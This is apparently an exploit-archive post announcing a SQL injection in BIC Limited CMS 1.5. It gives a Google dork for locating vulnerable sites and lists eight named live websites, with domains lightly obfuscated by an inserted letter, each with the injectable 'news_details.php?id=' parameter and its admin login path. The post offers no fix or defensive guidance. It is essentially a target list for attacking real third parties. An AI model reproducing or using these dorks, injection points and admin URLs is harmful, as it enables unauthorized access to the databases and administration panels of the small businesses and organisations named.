[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] # Exploit Title : BIC Limited CMS SQL Injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.web-design.hk # Google Dork : "Powered by BIC Limited" # Date: 2015/3/18 # Tested On : Windows 7 / Mozilla Firefox # Software Link : # Version : 1.5 # CVE : [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] # demos and explanations : http://www.wickXfield.com.hk/news_details.php?id=1' http://www.shouzXen.com.hk/news_details.php?id=1' http://www.chungsXhingtaxi.com.hk/news_details.php?id=1' http://www.cosmobeXebies.com.hk/news_details.php?id=14' http://www.trulydentaXl.com/news_details.php?id=23' http://www.exhibitiongrXoup.com.hk/en/news_details.php?id=43' http://www.eccare.coXm.hk/zh/news_details.php?id=2' http://hkceedXu.org/news_details.php?id=239' [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] http://www.wickfiXeld.com.hk/admin http://www.shouXzen.com.hk/admin http://www.chuXngshingtaxi.com.hk/admin http://www.coXsmobeebies.com.hk/admin http://www.tXrulydental.com/admin http://wwwX.exhibitiongroup.com.hk/admin http://www.eccare.Xcom.hk/admin http://hkcXeedu.org/admin [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ###################### # Special Tnx To Mahdi.Hidden ###################### # discovered by : Cyb3r_Dr4in ###################### [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]